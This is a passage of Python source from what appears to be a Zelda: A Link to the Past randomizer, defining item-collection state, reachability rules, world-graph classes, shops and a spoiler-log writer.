        ret.events = copy.copy(self.events)
        ret.path = copy.copy(self.path)
        ret.locations_checked = copy.copy(self.locations_checked)
        return ret
    def can_reach(self, spot, resolution_hint=None, player=None):
        """Reachability of a spot object, or of a name resolved via the hint."""
        try:
            spot_type = spot.spot_type
        except AttributeError:
            # try to resolve a name
            if resolution_hint == 'Location':
                spot = self.world.get_location(spot, player)
            elif resolution_hint == 'Entrance':
                spot = self.world.get_entrance(spot, player)
            else:
                # default to Region
                spot = self.world.get_region(spot, player)
        return spot.can_reach(self)
    def sweep_for_events(self, key_only=False, locations=None):
        """Collect every reachable event item until no new ones appear."""
        # this may need improvement
        if locations is None:
            locations = self.world.get_filled_locations()
        new_locations = True
        checked_locations = 0
        while new_locations:
            reachable_events = [location for location in locations if location.event and
                                (not key_only or (not self.world.keyshuffle[location.item.player] and location.item.smallkey) or (not self.world.bigkeyshuffle[location.item.player] and location.item.bigkey))
                                and location.can_reach(self)]
            for event in reachable_events:
                if (event.name, event.player) not in self.events:
                    self.events.append((event.name, event.player))
                    self.collect(event.item, True, event)
            new_locations = len(reachable_events) > checked_locations
            checked_locations = len(reachable_events)
    def has(self, item, player, count=1):
        """True when at least *count* copies of (item, player) are collected."""
        if count == 1:
            return (item, player) in self.prog_items
        return self.prog_items.count((item, player)) >= count
    def has_key(self, item, player, count=1):
        """Key check; retro mode substitutes purchasable universal keys."""
        if self.world.retro[player]:
            return self.can_buy_unlimited('Small Key (Universal)', player)
        if count == 1:
            return (item, player) in self.prog_items
        return self.prog_items.count((item, player)) >= count
    def can_buy_unlimited(self, item, player):
        """True if some reachable shop of this player restocks *item*."""
        for shop in self.world.shops:
            if shop.region.player == player and shop.has_unlimited(item) and shop.region.can_reach(self):
                return True
        return False
    def item_count(self, item, player):
        return self.prog_items.count((item, player))
    def has_crystals(self, count, player):
        crystals = ['Crystal 1', 'Crystal 2', 'Crystal 3', 'Crystal 4', 'Crystal 5', 'Crystal 6', 'Crystal 7']
        return len([crystal for crystal in crystals if self.has(crystal, player)]) >= count
    def can_lift_rocks(self, player):
        return self.has('Power Glove', player) or self.has('Titans Mitts', player)
    def has_bottle(self, player):
        return self.bottle_count(player) > 0
    def bottle_count(self, player):
        return len([item for (item, itemplayer) in self.prog_items if item.startswith('Bottle') and itemplayer == player])
    def has_hearts(self, player, count):
        # Warning: This only considers items that are marked as advancement items
        return self.heart_count(player) >= count
    def heart_count(self, player):
        # Warning: This only considers items that are marked as advancement items
        diff = self.world.difficulty_requirements[player]
        return (
            min(self.item_count('Boss Heart Container', player), diff.boss_heart_container_limit)
            + self.item_count('Sanctuary Heart Container', player)
            + min(self.item_count('Piece of Heart', player), diff.heart_piece_limit) // 4
            + 3 # starting hearts
        )
    def can_lift_heavy_rocks(self, player):
        return self.has('Titans Mitts', player)
    def can_extend_magic(self, player, smallmagic=16, fullrefill=False): #This reflects the total magic Link has, not the total extra he has.
        basemagic = 8
        if self.has('Quarter Magic', player):
            basemagic = 32
        elif self.has('Half Magic', player):
            basemagic = 16
        if self.can_buy_unlimited('Green Potion', player) or self.can_buy_unlimited('Blue Potion', player):
            if self.world.difficulty_adjustments[player] == 'hard' and not fullrefill:
                basemagic = basemagic + int(basemagic * 0.5 * self.bottle_count(player))
            elif self.world.difficulty_adjustments[player] == 'expert' and not fullrefill:
                basemagic = basemagic + int(basemagic * 0.25 * self.bottle_count(player))
            else:
                basemagic = basemagic + basemagic * self.bottle_count(player)
        return basemagic >= smallmagic
    def can_kill_most_things(self, player, enemies=5):
        return (self.has_blunt_weapon(player)
                or self.has('Cane of Somaria', player)
                or (self.has('Cane of Byrna', player) and (enemies < 6 or self.can_extend_magic(player)))
                or self.can_shoot_arrows(player)
                or self.has('Fire Rod', player)
                )
    def can_shoot_arrows(self, player):
        if self.world.retro[player]:
            #TODO: need to decide how we want to handle wooden arrows longer-term (a can-buy-a check, or via dynamic shop location)
            #FIXME: Should do something about hard+ ganon only silvers. For the moment, i believe they effective grant wooden, so we are safe
            return self.has('Bow', player) and (self.has('Silver Arrows', player) or self.can_buy_unlimited('Single Arrow', player))
        return self.has('Bow', player)
    def can_get_good_bee(self, player):
        cave = self.world.get_region('Good Bee Cave', player)
        return (
            self.has_bottle(player) and
            self.has('Bug Catching Net', player) and
            (self.has_Boots(player) or (self.has_sword(player) and self.has('Quake', player))) and
            cave.can_reach(self) and
            self.is_not_bunny(cave, player)
        )
    def has_sword(self, player):
        return self.has('Fighter Sword', player) or self.has('Master Sword', player) or self.has('Tempered Sword', player) or self.has('Golden Sword', player)
    def has_beam_sword(self, player):
        return self.has('Master Sword', player) or self.has('Tempered Sword', player) or self.has('Golden Sword', player)
    def has_blunt_weapon(self, player):
        return self.has_sword(player) or self.has('Hammer', player)
    def has_Mirror(self, player):
        return self.has('Magic Mirror', player)
    def has_Boots(self, player):
        return self.has('Pegasus Boots', player)
    def has_Pearl(self, player):
        return self.has('Moon Pearl', player)
    def has_fire_source(self, player):
        return self.has('Fire Rod', player) or self.has('Lamp', player)
    def can_flute(self, player):
        lw = self.world.get_region('Light World', player)
        return self.has('Ocarina', player) and lw.can_reach(self) and self.is_not_bunny(lw, player)
    def can_melt_things(self, player):
        return self.has('Fire Rod', player) or (self.has('Bombos', player) and self.has_sword(player))
    def can_avoid_lasers(self, player):
        return self.has('Mirror Shield', player) or self.has('Cane of Byrna', player) or self.has('Cape', player)
    def is_not_bunny(self, region, player):
        if self.has_Pearl(player):
            return True
        return region.is_light_world if self.world.mode[player] != 'inverted' else region.is_dark_world
    def can_reach_light_world(self, player):
        # any() short-circuits; equivalent to the old `True in [...]` scan.
        return any(i.is_light_world for i in self.reachable_regions[player])
    def can_reach_dark_world(self, player):
        return any(i.is_dark_world for i in self.reachable_regions[player])
    def has_misery_mire_medallion(self, player):
        return self.has(self.world.required_medallions[player][0], player)
    def has_turtle_rock_medallion(self, player):
        return self.has(self.world.required_medallions[player][1], player)
    def collect(self, item, event=False, location=None):
        """Add *item* to the state, resolving progressive items to their tier.

        Marks the player's region cache stale and, for non-event items that
        changed the inventory, sweeps for newly reachable events.
        """
        if location:
            self.locations_checked.add(location)
        changed = False
        if item.name.startswith('Progressive '):
            if 'Sword' in item.name:
                if self.has('Golden Sword', item.player):
                    pass
                elif self.has('Tempered Sword', item.player) and self.world.difficulty_requirements[item.player].progressive_sword_limit >= 4:
                    self.prog_items.add(('Golden Sword', item.player))
                    changed = True
                elif self.has('Master Sword', item.player) and self.world.difficulty_requirements[item.player].progressive_sword_limit >= 3:
                    self.prog_items.add(('Tempered Sword', item.player))
                    changed = True
                elif self.has('Fighter Sword', item.player) and self.world.difficulty_requirements[item.player].progressive_sword_limit >= 2:
                    self.prog_items.add(('Master Sword', item.player))
                    changed = True
                elif self.world.difficulty_requirements[item.player].progressive_sword_limit >= 1:
                    self.prog_items.add(('Fighter Sword', item.player))
                    changed = True
            elif 'Glove' in item.name:
                if self.has('Titans Mitts', item.player):
                    pass
                elif self.has('Power Glove', item.player):
                    self.prog_items.add(('Titans Mitts', item.player))
                    changed = True
                else:
                    self.prog_items.add(('Power Glove', item.player))
                    changed = True
            elif 'Shield' in item.name:
                if self.has('Mirror Shield', item.player):
                    pass
                elif self.has('Red Shield', item.player) and self.world.difficulty_requirements[item.player].progressive_shield_limit >= 3:
                    self.prog_items.add(('Mirror Shield', item.player))
                    changed = True
                elif self.has('Blue Shield', item.player) and self.world.difficulty_requirements[item.player].progressive_shield_limit >= 2:
                    self.prog_items.add(('Red Shield', item.player))
                    changed = True
                elif self.world.difficulty_requirements[item.player].progressive_shield_limit >= 1:
                    self.prog_items.add(('Blue Shield', item.player))
                    changed = True
            elif 'Bow' in item.name:
                if self.has('Silver Arrows', item.player):
                    pass
                elif self.has('Bow', item.player):
                    self.prog_items.add(('Silver Arrows', item.player))
                    changed = True
                else:
                    self.prog_items.add(('Bow', item.player))
                    changed = True
        elif item.name.startswith('Bottle'):
            if self.bottle_count(item.player) < self.world.difficulty_requirements[item.player].progressive_bottle_limit:
                self.prog_items.add((item.name, item.player))
                changed = True
        elif event or item.advancement:
            self.prog_items.add((item.name, item.player))
            changed = True
        self.stale[item.player] = True
        if changed:
            if not event:
                self.sweep_for_events()
    def remove(self, item):
        """Remove an advancement item, demoting progressive items one tier."""
        if item.advancement:
            to_remove = item.name
            if to_remove.startswith('Progressive '):
                if 'Sword' in to_remove:
                    if self.has('Golden Sword', item.player):
                        to_remove = 'Golden Sword'
                    elif self.has('Tempered Sword', item.player):
                        to_remove = 'Tempered Sword'
                    elif self.has('Master Sword', item.player):
                        to_remove = 'Master Sword'
                    elif self.has('Fighter Sword', item.player):
                        to_remove = 'Fighter Sword'
                    else:
                        to_remove = None
                elif 'Glove' in item.name:
                    if self.has('Titans Mitts', item.player):
                        to_remove = 'Titans Mitts'
                    elif self.has('Power Glove', item.player):
                        to_remove = 'Power Glove'
                    else:
                        to_remove = None
                elif 'Shield' in item.name:
                    if self.has('Mirror Shield', item.player):
                        to_remove = 'Mirror Shield'
                    elif self.has('Red Shield', item.player):
                        to_remove = 'Red Shield'
                    elif self.has('Blue Shield', item.player):
                        to_remove = 'Blue Shield'
                    else:
                        # BUGFIX: was the string 'None', which passed the
                        # `is not None` guard and attempted a bogus removal.
                        to_remove = None
                elif 'Bow' in item.name:
                    if self.has('Silver Arrows', item.player):
                        to_remove = 'Silver Arrows'
                    elif self.has('Bow', item.player):
                        to_remove = 'Bow'
                    else:
                        to_remove = None
            if to_remove is not None:
                try:
                    self.prog_items.remove((to_remove, item.player))
                except ValueError:
                    return
                # invalidate caches, nothing can be trusted anymore now
                self.reachable_regions[item.player] = set()
                self.stale[item.player] = True
    def __getattr__(self, item):
        if item.startswith('can_reach_'):
            # BUGFIX: was item[10] (a single character); the spot name is
            # everything after the 10-char 'can_reach_' prefix.
            return self.can_reach(item[10:])
        #elif item.startswith('has_'):
        #    return self.has(item[4:])
        if item == '__len__':
            # NOTE(review): presumably guards copy/pickle protocol probing —
            # returning None here instead of raising; confirm before changing.
            return
        raise RuntimeError('Cannot parse %s.' % item)
@unique
class RegionType(Enum):
    """Coarse classification of where a region lives in the game world."""
    LightWorld = 1
    DarkWorld = 2
    Cave = 3  # also covers houses
    Dungeon = 4

    @property
    def is_indoors(self):
        """True for Cave (including houses) and Dungeon regions."""
        return self is RegionType.Cave or self is RegionType.Dungeon
class Region(object):
    """A node in the world graph holding its entrances, exits and locations."""

    def __init__(self, name, type, hint, player):
        self.name = name
        self.type = type
        self.player = player
        self.hint_text = hint
        self.entrances = []
        self.exits = []
        self.locations = []
        self.dungeon = None
        self.shop = None
        self.world = None
        # Both flags start False; they are set after making connections.
        self.is_light_world = False
        self.is_dark_world = False
        self.spot_type = 'Region'
        self.recursion_count = 0

    def can_reach(self, state):
        """Cached reachability: refresh the player's region set if stale."""
        if state.stale[self.player]:
            state.update_reachable_regions(self.player)
        return self in state.reachable_regions[self.player]

    def can_reach_private(self, state):
        """Uncached check: reachable iff any entrance is; records the path taken."""
        for entrance in self.entrances:
            if not entrance.can_reach(state):
                continue
            if self not in state.path:
                state.path[self] = (self.name, state.path.get(entrance))
            return True
        return False

    def can_fill(self, item):
        """Whether *item* may go here; unshuffled dungeon items stay in their dungeon."""
        dungeon_bound = ((item.smallkey and not self.world.keyshuffle[item.player])
                         or (item.bigkey and not self.world.bigkeyshuffle[item.player])
                         or (item.map and not self.world.mapshuffle[item.player])
                         or (item.compass and not self.world.compassshuffle[item.player]))
        sewer_hack = self.world.mode[item.player] == 'standard' and item.name == 'Small Key (Escape)'
        if not (sewer_hack or dungeon_bound):
            return True
        return self.dungeon and self.dungeon.is_dungeon_item(item) and item.player == self.player

    def __str__(self):
        return str(self.__unicode__())

    def __unicode__(self):
        if self.world:
            return self.world.get_name_string_for_object(self)
        return f'{self.name} (Player {self.player})'
class Entrance(object):
    """A directed exit from a parent region, optionally connected onward."""

    def __init__(self, player, name='', parent=None):
        self.player = player
        self.name = name
        self.parent_region = parent
        self.connected_region = None
        self.target = None
        self.addresses = None
        self.vanilla = None
        self.spot_type = 'Entrance'
        self.recursion_count = 0
        # Default rule: always passable.
        self.access_rule = lambda state: True

    def can_reach(self, state):
        """Reachable when the parent region is reachable and the rule allows it."""
        if not (self.parent_region.can_reach(state) and self.access_rule(state)):
            return False
        if self not in state.path:
            # Record how we got here for spoiler path output.
            state.path[self] = (self.name, state.path.get(self.parent_region, (self.parent_region.name, None)))
        return True

    def connect(self, region, addresses=None, target=None, vanilla=None):
        """Attach this entrance to *region* and register it on that region."""
        self.connected_region = region
        self.addresses = addresses
        self.target = target
        self.vanilla = vanilla
        region.entrances.append(self)

    def __str__(self):
        return str(self.__unicode__())

    def __unicode__(self):
        world = self.parent_region.world if self.parent_region else None
        if world:
            return world.get_name_string_for_object(self)
        return f'{self.name} (Player {self.player})'
class Dungeon(object):
    """A dungeon: its regions, key/item pools, and boss assignments."""

    def __init__(self, name, regions, big_key, small_keys, dungeon_items, player):
        self.name = name
        self.player = player
        self.regions = regions
        self.big_key = big_key
        self.small_keys = small_keys
        self.dungeon_items = dungeon_items
        self.bosses = dict()
        self.world = None

    @property
    def boss(self):
        # The None-keyed entry is the dungeon's single/default boss.
        return self.bosses.get(None, None)

    @boss.setter
    def boss(self, value):
        self.bosses[None] = value

    @property
    def keys(self):
        """Small keys plus the big key (when present), as a fresh list."""
        if self.big_key:
            return self.small_keys + [self.big_key]
        return self.small_keys + []

    @property
    def all_items(self):
        """Every dungeon-bound item: maps/compasses plus all keys."""
        return self.dungeon_items + self.keys

    def is_dungeon_item(self, item):
        """True when *item* belongs to this dungeon's own player and item set."""
        if item.player != self.player:
            return False
        return any(item.name == own.name for own in self.all_items)

    def __str__(self):
        return str(self.__unicode__())

    def __unicode__(self):
        if self.world:
            return self.world.get_name_string_for_object(self)
        return f'{self.name} (Player {self.player})'
class Boss(object):
    """A boss placement: display/enemizer names plus its defeat rule."""

    def __init__(self, name, enemizer_name, defeat_rule, player):
        self.player = player
        self.name = name
        self.enemizer_name = enemizer_name
        self.defeat_rule = defeat_rule

    def can_defeat(self, state):
        """Evaluate this boss's defeat rule against *state* for its player."""
        return self.defeat_rule(state, self.player)
class Location(object):
    """A single item-placement spot inside a region."""

    def __init__(self, player, name='', address=None, crystal=False, hint_text=None, parent=None, player_address=None):
        self.player = player
        self.name = name
        self.parent_region = parent
        self.item = None
        self.crystal = crystal
        self.address = address
        self.player_address = player_address
        self.spot_type = 'Location'
        self.hint_text = 'Hyrule' if hint_text is None else hint_text
        self.recursion_count = 0
        self.staleness_count = 0
        self.event = False
        self.locked = False
        # Overridable hooks; defaults are permissive except always_allow,
        # which opts in specific items only.
        self.always_allow = lambda item, state: False
        self.access_rule = lambda state: True
        self.item_rule = lambda item: True

    def can_fill(self, state, item, check_access=True):
        """Whether *item* may be placed here, optionally requiring reachability."""
        if self.always_allow(state, item):
            return True
        if not (self.parent_region.can_fill(item) and self.item_rule(item)):
            return False
        return (not check_access) or self.can_reach(state)

    def can_reach(self, state):
        """True when the parent region is reachable and the access rule passes."""
        if not self.parent_region.can_reach(state):
            return False
        return True if self.access_rule(state) else False

    def __str__(self):
        return str(self.__unicode__())

    def __unicode__(self):
        if self.parent_region and self.parent_region.world:
            return self.parent_region.world.get_name_string_for_object(self)
        return f'{self.name} (Player {self.player})'
class Item(object):
    """A placeable game item plus its credit/hint texts and ROM code."""

    def __init__(self, name='', advancement=False, priority=False, type=None, code=None, pedestal_hint=None, pedestal_credit=None, sickkid_credit=None, zora_credit=None, witch_credit=None, fluteboy_credit=None, hint_text=None, player=None):
        self.name = name
        self.advancement = advancement
        self.priority = priority
        self.type = type
        self.player = player
        self.code = code
        self.pedestal_hint_text = pedestal_hint
        self.pedestal_credit_text = pedestal_credit
        self.sickkid_credit_text = sickkid_credit
        self.zora_credit_text = zora_credit
        self.magicshop_credit_text = witch_credit
        self.fluteboy_credit_text = fluteboy_credit
        self.hint_text = hint_text
        self.location = None
        self.world = None

    def _has_type(self, type_name):
        # The category flags below are all simple type-tag comparisons.
        return self.type == type_name

    @property
    def crystal(self):
        return self._has_type('Crystal')

    @property
    def smallkey(self):
        return self._has_type('SmallKey')

    @property
    def bigkey(self):
        return self._has_type('BigKey')

    @property
    def map(self):
        return self._has_type('Map')

    @property
    def compass(self):
        return self._has_type('Compass')

    def __str__(self):
        return str(self.__unicode__())

    def __unicode__(self):
        if self.world:
            return self.world.get_name_string_for_object(self)
        return f'{self.name} (Player {self.player})'
# Crystals have 6 addresses that need to be filled in later.
class Crystal(Item):
    """Marker subclass for crystal items; no behavior beyond Item."""
@unique
class ShopType(Enum):
    """Kinds of shop rooms; values feed the shop config bits in get_bytes."""
    Shop = 0
    TakeAny = 1
    UpgradeShop = 2
class Shop(object):
    """A shop room: three inventory slots plus ROM-config metadata."""

    def __init__(self, region, room_id, type, shopkeeper_config, custom, locked):
        self.region = region
        self.room_id = room_id
        self.type = type
        self.shopkeeper_config = shopkeeper_config
        self.custom = custom
        self.locked = locked
        self.inventory = [None, None, None]

    @property
    def item_count(self):
        """Highest occupied slot index + 1 (slots are filled front-to-back)."""
        for idx in (2, 1, 0):
            if self.inventory[idx]:
                return idx + 1
        return 0

    def get_bytes(self):
        # [id][roomID-low][roomID-high][doorID][zero][shop_config][shopkeeper_config][sram_index]
        config = self.item_count
        entrances = self.region.entrances
        door_id = 0
        if len(entrances) == 1 and entrances[0].name in door_addresses:
            door_id = door_addresses[entrances[0].name][0] + 1
        else:
            config |= 0x40 # ignore door id
        if self.type == ShopType.TakeAny:
            config |= 0x80
        if self.type == ShopType.UpgradeShop:
            config |= 0x10 # Alt. VRAM
        return [0x00] + int16_as_bytes(self.room_id) + [door_id, 0x00, config, self.shopkeeper_config, 0x00]

    def has_unlimited(self, item):
        """True when some slot restocks *item* (as replacement or direct stock)."""
        for slot in self.inventory:
            if slot is None:
                continue
            if slot['max'] != 0 and slot['replacement'] is not None and slot['replacement'] == item:
                return True
            if slot['item'] is not None and slot['item'] == item:
                return True
        return False

    def clear_inventory(self):
        self.inventory = [None, None, None]

    def add_inventory(self, slot, item, price, max=0, replacement=None, replacement_price=0, create_location=False):
        """Fill one inventory slot with an item record."""
        self.inventory[slot] = {
            'item': item,
            'price': price,
            'max': max,
            'replacement': replacement,
            'replacement_price': replacement_price,
            'create_location': create_location
        }
class Spoiler(object):
    """Aggregates a fully generated (multi)world into spoiler output.

    parse_data() snapshots the world state into plain dicts; to_json() and
    to_file() render that snapshot as JSON or a human-readable spoiler log.
    """
    def __init__(self, world):
        self.world = world
        self.hashes = {}  # (player, team) -> file-select hash string
        self.entrances = OrderedDict()
        self.medallions = {}
        self.playthrough = {}
        self.unreachables = []
        self.startinventory = []
        self.locations = {}
        self.paths = {}
        self.metadata = {}
        self.shops = []
        self.bosses = OrderedDict()
    def set_entrance(self, entrance, exit, direction, player):
        """Record one shuffled entrance pairing; the player column is omitted for solo seeds."""
        if self.world.players == 1:
            self.entrances[(entrance, direction, player)] = OrderedDict([('entrance', entrance), ('exit', exit), ('direction', direction)])
        else:
            self.entrances[(entrance, direction, player)] = OrderedDict([('player', player), ('entrance', entrance), ('exit', exit), ('direction', direction)])
    def parse_data(self):
        """Snapshot medallions, items, shops, bosses and seed metadata from self.world."""
        self.medallions = OrderedDict()
        if self.world.players == 1:
            self.medallions['Misery Mire'] = self.world.required_medallions[1][0]
            self.medallions['Turtle Rock'] = self.world.required_medallions[1][1]
        else:
            for player in range(1, self.world.players + 1):
                self.medallions[f'Misery Mire ({self.world.get_player_names(player)})'] = self.world.required_medallions[player][0]
                self.medallions[f'Turtle Rock ({self.world.get_player_names(player)})'] = self.world.required_medallions[player][1]
        self.startinventory = list(map(str, self.world.precollected_items))
        self.locations = OrderedDict()
        # Group locations by area; listed_locations guarantees each location appears once.
        listed_locations = set()
        lw_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.type == RegionType.LightWorld]
        self.locations['Light World'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in lw_locations])
        listed_locations.update(lw_locations)
        dw_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.type == RegionType.DarkWorld]
        self.locations['Dark World'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in dw_locations])
        listed_locations.update(dw_locations)
        cave_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.type == RegionType.Cave]
        self.locations['Caves'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in cave_locations])
        listed_locations.update(cave_locations)
        for dungeon in self.world.dungeons:
            dungeon_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.dungeon == dungeon]
            self.locations[str(dungeon)] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in dungeon_locations])
            listed_locations.update(dungeon_locations)
        other_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations]
        if other_locations:
            self.locations['Other Locations'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in other_locations])
            listed_locations.update(other_locations)
        # Only customized shops are worth listing in the spoiler.
        self.shops = []
        for shop in self.world.shops:
            if not shop.custom:
                continue
            shopdata = {'location': str(shop.region),
                        'type': 'Take Any' if shop.type == ShopType.TakeAny else 'Shop'
                        }
            for index, item in enumerate(shop.inventory):
                if item is None:
                    continue
                shopdata['item_{}'.format(index)] = "{} — {}".format(item['item'], item['price']) if item['price'] else item['item']
            self.shops.append(shopdata)
        for player in range(1, self.world.players + 1):
            self.bosses[str(player)] = OrderedDict()
            self.bosses[str(player)]["Eastern Palace"] = self.world.get_dungeon("Eastern Palace", player).boss.name
            self.bosses[str(player)]["Desert Palace"] = self.world.get_dungeon("Desert Palace", player).boss.name
            self.bosses[str(player)]["Tower Of Hera"] = self.world.get_dungeon("Tower of Hera", player).boss.name
            self.bosses[str(player)]["Hyrule Castle"] = "Agahnim"
            self.bosses[str(player)]["Palace Of Darkness"] = self.world.get_dungeon("Palace of Darkness", player).boss.name
            self.bosses[str(player)]["Swamp Palace"] = self.world.get_dungeon("Swamp Palace", player).boss.name
            self.bosses[str(player)]["Skull Woods"] = self.world.get_dungeon("Skull Woods", player).boss.name
            self.bosses[str(player)]["Thieves Town"] = self.world.get_dungeon("Thieves Town", player).boss.name
            self.bosses[str(player)]["Ice Palace"] = self.world.get_dungeon("Ice Palace", player).boss.name
            self.bosses[str(player)]["Misery Mire"] = self.world.get_dungeon("Misery Mire", player).boss.name
            self.bosses[str(player)]["Turtle Rock"] = self.world.get_dungeon("Turtle Rock", player).boss.name
            # Ganon's Tower has three sub-bosses; inverted mode uses a differently named dungeon.
            if self.world.mode[player] != 'inverted':
                self.bosses[str(player)]["Ganons Tower Basement"] = self.world.get_dungeon('Ganons Tower', player).bosses['bottom'].name
                self.bosses[str(player)]["Ganons Tower Middle"] = self.world.get_dungeon('Ganons Tower', player).bosses['middle'].name
                self.bosses[str(player)]["Ganons Tower Top"] = self.world.get_dungeon('Ganons Tower', player).bosses['top'].name
            else:
                self.bosses[str(player)]["Ganons Tower Basement"] = self.world.get_dungeon('Inverted Ganons Tower', player).bosses['bottom'].name
                self.bosses[str(player)]["Ganons Tower Middle"] = self.world.get_dungeon('Inverted Ganons Tower', player).bosses['middle'].name
                self.bosses[str(player)]["Ganons Tower Top"] = self.world.get_dungeon('Inverted Ganons Tower', player).bosses['top'].name
            self.bosses[str(player)]["Ganons Tower"] = "Agahnim 2"
            self.bosses[str(player)]["Ganon"] = "Ganon"
        if self.world.players == 1:
            # solo seeds flatten the per-player mapping
            self.bosses = self.bosses["1"]
        # local import, presumably to avoid a circular dependency — TODO confirm
        from Main import __version__ as ERVersion
        self.metadata = {'version': ERVersion,
                         'logic': self.world.logic,
                         'mode': self.world.mode,
                         'retro': self.world.retro,
                         'weapons': self.world.swords,
                         'goal': self.world.goal,
                         'shuffle': self.world.shuffle,
                         'item_pool': self.world.difficulty,
                         'item_functionality': self.world.difficulty_adjustments,
                         'gt_crystals': self.world.crystals_needed_for_gt,
                         'ganon_crystals': self.world.crystals_needed_for_ganon,
                         'open_pyramid': self.world.open_pyramid,
                         'accessibility': self.world.accessibility,
                         'hints': self.world.hints,
                         'mapshuffle': self.world.mapshuffle,
                         'compassshuffle': self.world.compassshuffle,
                         'keyshuffle': self.world.keyshuffle,
                         'bigkeyshuffle': self.world.bigkeyshuffle,
                         'boss_shuffle': self.world.boss_shuffle,
                         'enemy_shuffle': self.world.enemy_shuffle,
                         'enemy_health': self.world.enemy_health,
                         'enemy_damage': self.world.enemy_damage,
                         'beemizer': self.world.beemizer,
                         'progressive': self.world.progressive,
                         'shufflepots': self.world.shufflepots,
                         'players': self.world.players,
                         'teams': self.world.teams
                         }
    def to_json(self):
        """Render the parsed spoiler data as a JSON string."""
        self.parse_data()
        out = OrderedDict()
        out['Entrances'] = list(self.entrances.values())
        out.update(self.locations)
        out['Starting Inventory'] = self.startinventory
        out['Special'] = self.medallions
        if self.hashes:
            out['Hashes'] = {f"{self.world.player_names[player][team]} (Team {team+1})": hash for (player, team), hash in self.hashes.items()}
        if self.shops:
            out['Shops'] = self.shops
        out['playthrough'] = self.playthrough
        out['paths'] = self.paths
        out['Bosses'] = self.bosses
        out['meta'] = self.metadata
        return json.dumps(out)
    def to_file(self, filename):
        """Write the human-readable spoiler log to *filename* (overwrites)."""
        self.parse_data()
        with open(filename, 'w') as outfile:
            outfile.write('ALttP Entrance Randomizer Version %s - Seed: %s\n\n' % (self.metadata['version'], self.world.seed))
            outfile.write('Filling Algorithm: %s\n' % self.world.algorithm)
            outfile.write('Players: %d\n' % self.world.players)
            outfile.write('Teams: %d\n' % self.world.teams)
            # per-player settings header
            for player in range(1, self.world.players + 1):
                if self.world.players > 1:
                    outfile.write('\nPlayer %d: %s\n' % (player, self.world.get_player_names(player)))
                for team in range(self.world.teams):
                    outfile.write('%s%s\n' % (f"Hash - {self.world.player_names[player][team]} (Team {team+1}): " if self.world.teams > 1 else 'Hash: ', self.hashes[player, team]))
                outfile.write('Logic: %s\n' % self.metadata['logic'][player])
                outfile.write('Mode: %s\n' % self.metadata['mode'][player])
                outfile.write('Retro: %s\n' % ('Yes' if self.metadata['retro'][player] else 'No'))
                outfile.write('Swords: %s\n' % self.metadata['weapons'][player])
                outfile.write('Goal: %s\n' % self.metadata['goal'][player])
                outfile.write('Difficulty: %s\n' % self.metadata['item_pool'][player])
                outfile.write('Item Functionality: %s\n' % self.metadata['item_functionality'][player])
                outfile.write('Item Progression: %s\n' % self.metadata['progressive'][player])
                outfile.write('Entrance Shuffle: %s\n' % self.metadata['shuffle'][player])
                outfile.write('Crystals required for GT: %s\n' % self.metadata['gt_crystals'][player])
                outfile.write('Crystals required for Ganon: %s\n' % self.metadata['ganon_crystals'][player])
                outfile.write('Pyramid hole pre-opened: %s\n' % ('Yes' if self.metadata['open_pyramid'][player] else 'No'))
                outfile.write('Accessibility: %s\n' % self.metadata['accessibility'][player])
                outfile.write('Map shuffle: %s\n' % ('Yes' if self.metadata['mapshuffle'][player] else 'No'))
                outfile.write('Compass shuffle: %s\n' % ('Yes' if self.metadata['compassshuffle'][player] else 'No'))
                outfile.write('Small Key shuffle: %s\n' % ('Yes' if self.metadata['keyshuffle'][player] else 'No'))
                outfile.write('Big Key shuffle: %s\n' % ('Yes' if self.metadata['bigkeyshuffle'][player] else 'No'))
                outfile.write('Boss shuffle: %s\n' % self.metadata['boss_shuffle'][player])
                outfile.write('Enemy shuffle: %s\n' % self.metadata['enemy_shuffle'][player])
                outfile.write('Enemy health: %s\n' % self.metadata['enemy_health'][player])
                outfile.write('Enemy damage: %s\n' % self.metadata['enemy_damage'][player])
                outfile.write('Hints: %s\n' % ('Yes' if self.metadata['hints'][player] else 'No'))
                outfile.write('Beemizer: %s\n' % self.metadata['beemizer'][player])
                outfile.write('Pot shuffle %s\n' % ('Yes' if self.metadata['shufflepots'][player] else 'No'))
            if self.entrances:
                outfile.write('\n\nEntrances:\n\n')
                outfile.write('\n'.join(['%s%s %s %s' % (f'{self.world.get_player_names(entry["player"])}: ' if self.world.players > 1 else '', entry['entrance'], '<=>' if entry['direction'] == 'both' else '<=' if entry['direction'] == 'exit' else '=>', entry['exit']) for entry in self.entrances.values()]))
            outfile.write('\n\nMedallions:\n')
            for dungeon, medallion in self.medallions.items():
                outfile.write(f'\n{dungeon}: {medallion}')
            if self.startinventory:
                outfile.write('\n\nStarting Inventory:\n\n')
                outfile.write('\n'.join(self.startinventory))
            outfile.write('\n\nLocations:\n\n')
            outfile.write('\n'.join(['%s: %s' % (location, item) for grouping in self.locations.values() for (location, item) in grouping.items()]))
            outfile.write('\n\nShops:\n\n')
            outfile.write('\n'.join("{} [{}]\n    {}".format(shop['location'], shop['type'], "\n    ".join(item for item in [shop.get('item_0', None), shop.get('item_1', None), shop.get('item_2', None)] if item)) for shop in self.shops))
            outfile.write('\n\nPlaythrough:\n\n')
            outfile.write('\n'.join(['%s: {\n%s\n}' % (sphere_nr, '\n'.join(['  %s: %s' % (location, item) for (location, item) in sphere.items()] if sphere_nr != '0' else [f'  {item}' for item in sphere])) for (sphere_nr, sphere) in self.playthrough.items()]))
            if self.unreachables:
                outfile.write('\n\nUnreachable Items:\n\n')
                outfile.write('\n'.join(['%s: %s' % (unreachable.item, unreachable) for unreachable in self.unreachables]))
            outfile.write('\n\nPaths:\n\n')
            path_listings = []
            for location, path in sorted(self.paths.items()):
                path_lines = []
                for region, exit in path:
                    if exit is not None:
                        path_lines.append("{} -> {}".format(region, exit))
                    else:
                        path_lines.append(region)
                path_listings.append("{}\n        {}".format(location, "\n   =>   ".join(path_lines)))
